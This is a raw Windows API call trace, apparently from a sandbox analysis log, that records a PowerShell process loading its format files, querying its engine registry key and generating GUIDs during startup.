	[0381.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0381.731] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0381.731] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0381.731] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0381.732] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0381.732] CoTaskMemFree (pv=0x171540) 
	[0381.732] RegCloseKey (hKey=0x330) returned 0x0
	[0381.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0381.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0381.736] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xea6e926c, Data2=0x8fbe, Data3=0x47c5, Data4=([0]=0xa6, [1]=0xd, [2]=0xb6, [3]=0x65, [4]=0xb, [5]=0x65, [6]=0x28, [7]=0x16))) returned 0x0
	[0381.737] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc7a4dd1c, Data2=0xbc4f, Data3=0x4bc7, Data4=([0]=0xa5, [1]=0xd8, [2]=0xae, [3]=0x4b, [4]=0xca, [5]=0x1, [6]=0xa9, [7]=0xe4))) returned 0x0
	[0381.737] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8fd877e3, Data2=0xac36, Data3=0x4607, Data4=([0]=0x9e, [1]=0x68, [2]=0x60, [3]=0x26, [4]=0x1c, [5]=0x83, [6]=0xaa, [7]=0x6d))) returned 0x0
	[0381.738] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xcba15cc9, Data2=0x8d46, Data3=0x4c39, Data4=([0]=0xa8, [1]=0x29, [2]=0x3f, [3]=0xfc, [4]=0x8c, [5]=0x14, [6]=0x5c, [7]=0x27))) returned 0x0
	[0381.739] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xf2aa7103, Data2=0xa16, Data3=0x4f49, Data4=([0]=0xb7, [1]=0x77, [2]=0x7a, [3]=0xf5, [4]=0x45, [5]=0x94, [6]=0x65, [7]=0xbe))) returned 0x0
	[0381.739] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x4596e3e3, Data2=0x345b, Data3=0x4148, Data4=([0]=0xad, [1]=0xee, [2]=0xc, [3]=0xf7, [4]=0x5b, [5]=0xae, [6]=0x69, [7]=0xa1))) returned 0x0
	[0381.740] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.741] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xbc3cf199, Data2=0xe079, Data3=0x4b87, Data4=([0]=0x98, [1]=0xfb, [2]=0x72, [3]=0x34, [4]=0xdd, [5]=0xf0, [6]=0x5f, [7]=0x30))) returned 0x0
	[0381.741] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.743] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.743] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xd41bba16, Data2=0xe3bf, Data3=0x4214, Data4=([0]=0x87, [1]=0x9a, [2]=0x1a, [3]=0x2, [4]=0x47, [5]=0xa6, [6]=0xf1, [7]=0xfc))) returned 0x0
	[0381.744] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa32155db, Data2=0x161f, Data3=0x45f7, Data4=([0]=0xb4, [1]=0xab, [2]=0x36, [3]=0xab, [4]=0x2f, [5]=0xff, [6]=0xf6, [7]=0x9f))) returned 0x0
	[0381.744] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xbf5ae24c, Data2=0x390f, Data3=0x4665, Data4=([0]=0xb3, [1]=0x97, [2]=0xd1, [3]=0xf8, [4]=0x3c, [5]=0xb3, [6]=0x87, [7]=0x3a))) returned 0x0
	[0381.744] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x7ca5809e, Data2=0x229c, Data3=0x4b34, Data4=([0]=0x8b, [1]=0x82, [2]=0x95, [3]=0x9d, [4]=0x12, [5]=0x5b, [6]=0x4, [7]=0x2f))) returned 0x0
	[0381.744] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.744] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x62377def, Data2=0x456c, Data3=0x4812, Data4=([0]=0xad, [1]=0x2a, [2]=0x4d, [3]=0x6, [4]=0xe2, [5]=0x27, [6]=0x92, [7]=0x2e))) returned 0x0
	[0381.744] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.745] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.745] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.745] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.745] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.745] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8aa9e271, Data2=0x7a94, Data3=0x43f1, Data4=([0]=0xb9, [1]=0x0, [2]=0x86, [3]=0xd4, [4]=0x5d, [5]=0x4e, [6]=0x54, [7]=0x30))) returned 0x0
	[0381.746] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x54e22750, Data2=0x5a24, Data3=0x492f, Data4=([0]=0xbf, [1]=0x71, [2]=0xf2, [3]=0x74, [4]=0xc, [5]=0xfc, [6]=0x89, [7]=0x9b))) returned 0x0
	[0381.746] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xfa958d26, Data2=0xe952, Data3=0x402a, Data4=([0]=0x85, [1]=0x2c, [2]=0xf1, [3]=0x51, [4]=0x5f, [5]=0xcb, [6]=0xe3, [7]=0x5b))) returned 0x0
	[0381.746] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe093fa38, Data2=0xa810, Data3=0x443e, Data4=([0]=0xa4, [1]=0x20, [2]=0xa2, [3]=0x31, [4]=0xfb, [5]=0x0, [6]=0xcf, [7]=0xfc))) returned 0x0
	[0381.746] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x25ac5e5c, Data2=0xc7e0, Data3=0x4e63, Data4=([0]=0x99, [1]=0x7, [2]=0x49, [3]=0xd3, [4]=0x7e, [5]=0x63, [6]=0xd1, [7]=0x3d))) returned 0x0
	[0381.746] VirtualQuery (in: lpAddress=0x24bd40, lpBuffer=0x24cc00, dwLength=0x30 | out: lpBuffer=0x24cc00*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.746] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc6fd12d3, Data2=0xaca9, Data3=0x414f, Data4=([0]=0x9e, [1]=0x35, [2]=0xb6, [3]=0x7d, [4]=0x48, [5]=0x4a, [6]=0x97, [7]=0x8e))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xbd9c62f0, Data2=0x90cb, Data3=0x4463, Data4=([0]=0xa6, [1]=0x91, [2]=0x45, [3]=0x3c, [4]=0x72, [5]=0x25, [6]=0x5b, [7]=0xe5))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe5e774e1, Data2=0x518c, Data3=0x4cae, Data4=([0]=0xb0, [1]=0x1e, [2]=0xb6, [3]=0xa5, [4]=0x8, [5]=0x85, [6]=0x72, [7]=0xd6))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x773431c1, Data2=0x426d, Data3=0x4e8c, Data4=([0]=0xa0, [1]=0x23, [2]=0xb7, [3]=0x63, [4]=0xee, [5]=0xa3, [6]=0x39, [7]=0x1))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x9efd669b, Data2=0xab86, Data3=0x4bce, Data4=([0]=0x9d, [1]=0x51, [2]=0x5d, [3]=0x54, [4]=0xa1, [5]=0xff, [6]=0x79, [7]=0x43))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xedbb410c, Data2=0x2b10, Data3=0x4e79, Data4=([0]=0x92, [1]=0x30, [2]=0x1b, [3]=0x4e, [4]=0x50, [5]=0x95, [6]=0xe5, [7]=0x73))) returned 0x0
	[0381.747] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8b25fa96, Data2=0x6eef, Data3=0x4788, Data4=([0]=0xba, [1]=0x33, [2]=0xf8, [3]=0x67, [4]=0x64, [5]=0x28, [6]=0x14, [7]=0x27))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xde7b5a98, Data2=0x784c, Data3=0x405a, Data4=([0]=0x90, [1]=0x23, [2]=0x4f, [3]=0x62, [4]=0xed, [5]=0x8d, [6]=0x18, [7]=0x57))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe2ef5b90, Data2=0x2ef9, Data3=0x4554, Data4=([0]=0x9d, [1]=0xe, [2]=0xa4, [3]=0xdc, [4]=0xd4, [5]=0x52, [6]=0x3d, [7]=0x45))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xc3a8f641, Data2=0x11b1, Data3=0x4f8e, Data4=([0]=0xa6, [1]=0x36, [2]=0x35, [3]=0xa9, [4]=0x72, [5]=0xa3, [6]=0x6d, [7]=0x17))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xb6ce984f, Data2=0x9944, Data3=0x49e2, Data4=([0]=0x8b, [1]=0x91, [2]=0x21, [3]=0x1d, [4]=0xa6, [5]=0xcf, [6]=0x8f, [7]=0x1b))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x36f20cd, Data2=0xeee4, Data3=0x4023, Data4=([0]=0xb2, [1]=0x89, [2]=0xeb, [3]=0x40, [4]=0x7a, [5]=0x13, [6]=0xc0, [7]=0xf0))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x7c887a3b, Data2=0x4868, Data3=0x4e95, Data4=([0]=0xac, [1]=0xe5, [2]=0x6a, [3]=0xd4, [4]=0xb7, [5]=0x2, [6]=0x83, [7]=0x92))) returned 0x0
	[0381.748] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xdbfdfdee, Data2=0x5983, Data3=0x4bc3, Data4=([0]=0x99, [1]=0x82, [2]=0x96, [3]=0xab, [4]=0xf1, [5]=0xd, [6]=0xbd, [7]=0x2e))) returned 0x0
	[0381.749] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xa9f84b8c, Data2=0xc7d3, Data3=0x440f, Data4=([0]=0x93, [1]=0x30, [2]=0x2d, [3]=0xa4, [4]=0x82, [5]=0xf8, [6]=0x90, [7]=0xec))) returned 0x0
	[0381.749] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x6cc510da, Data2=0xd217, Data3=0x429e, Data4=([0]=0x9d, [1]=0xaa, [2]=0x61, [3]=0x6c, [4]=0xdc, [5]=0x81, [6]=0x30, [7]=0x2d))) returned 0x0
	[0381.749] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xd6f2bac3, Data2=0x3d89, Data3=0x4c15, Data4=([0]=0xa0, [1]=0x75, [2]=0x47, [3]=0x21, [4]=0x3a, [5]=0xd8, [6]=0x37, [7]=0x75))) returned 0x0
	[0381.749] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xe28d47c4, Data2=0xf95a, Data3=0x48c2, Data4=([0]=0x86, [1]=0x96, [2]=0xb4, [3]=0xf2, [4]=0x18, [5]=0xc7, [6]=0xb4, [7]=0xe1))) returned 0x0
	[0381.749] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x93b85f09, Data2=0x1da, Data3=0x4965, Data4=([0]=0x84, [1]=0x76, [2]=0xa3, [3]=0xd0, [4]=0x6d, [5]=0x95, [6]=0xb2, [7]=0xf3))) returned 0x0
	[0381.749] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.750] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.750] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.751] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xd14de71d, Data2=0x4ec8, Data3=0x4c13, Data4=([0]=0xb1, [1]=0x36, [2]=0xce, [3]=0x60, [4]=0x6a, [5]=0x71, [6]=0xaa, [7]=0x8a))) returned 0x0
	[0381.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0381.751] SetErrorMode (uMode=0x1) returned 0x1
	[0381.752] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0381.752] GetFileType (hFile=0x330) returned 0x1
	[0381.752] SetErrorMode (uMode=0x1) returned 0x1
	[0381.752] GetFileType (hFile=0x330) returned 0x1
	[0381.752] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.753] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.754] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.754] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.754] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.755] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x1000, lpOverlapped=0x0) returned 1
	[0381.755] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x119, lpOverlapped=0x0) returned 1
	[0381.755] ReadFile (in: hFile=0x330, lpBuffer=0x34a2fa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24ce18, lpOverlapped=0x0 | out: lpBuffer=0x34a2fa0*, lpNumberOfBytesRead=0x24ce18*=0x0, lpOverlapped=0x0) returned 1
	[0381.755] CloseHandle (hObject=0x330) returned 1
	[0381.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0381.755] SetErrorMode (uMode=0x1) returned 0x1
	[0381.755] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cdc0 | out: lpFileInformation=0x24cdc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0381.756] SetErrorMode (uMode=0x1) returned 0x1
	[0381.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0381.756] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24cea8 | out: phkResult=0x24cea8*=0x330) returned 0x0
	[0381.756] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ce2c, lpData=0x0, lpcbData=0x24ce28*=0x0 | out: lpType=0x24ce2c*=0x1, lpData=0x0, lpcbData=0x24ce28*=0x56) returned 0x0
	[0381.756] CoTaskMemAlloc (cb=0x5a) returned 0x171540
	[0381.756] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cdfc, lpData=0x171540, lpcbData=0x24cdf8*=0x56 | out: lpType=0x24cdfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cdf8*=0x56) returned 0x0
	[0381.756] CoTaskMemFree (pv=0x171540) 
	[0381.756] RegCloseKey (hKey=0x330) returned 0x0
	[0381.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0381.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0381.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0381.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0381.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0381.758] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.759] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x8a4295f8, Data2=0x861b, Data3=0x4684, Data4=([0]=0xb9, [1]=0xd6, [2]=0x49, [3]=0x2d, [4]=0x7c, [5]=0x85, [6]=0x45, [7]=0xc))) returned 0x0
	[0381.759] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.759] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0xea83ca6e, Data2=0x5ca5, Data3=0x4716, Data4=([0]=0x8e, [1]=0x3, [2]=0x38, [3]=0x82, [4]=0x3f, [5]=0xbc, [6]=0xa9, [7]=0xfb))) returned 0x0
	[0381.759] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x30d1fae1, Data2=0x2c9c, Data3=0x43a9, Data4=([0]=0x9b, [1]=0x3a, [2]=0xcc, [3]=0x67, [4]=0xd5, [5]=0x68, [6]=0xb5, [7]=0x3f))) returned 0x0
	[0381.759] CoCreateGuid (in: pguid=0x24d0d0 | out: pguid=0x24d0d0*(Data1=0x12117e7a, Data2=0x2a87, Data3=0x46b9, Data4=([0]=0x80, [1]=0xe9, [2]=0xa0, [3]=0x62, [4]=0xed, [5]=0x83, [6]=0x63, [7]=0x6d))) returned 0x0
	[0381.760] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.760] VirtualQuery (in: lpAddress=0x24ba80, lpBuffer=0x24c940, dwLength=0x30 | out: lpBuffer=0x24c940*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0381.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0381.760] SetErrorMode (uMode=0x1) returned 0x1
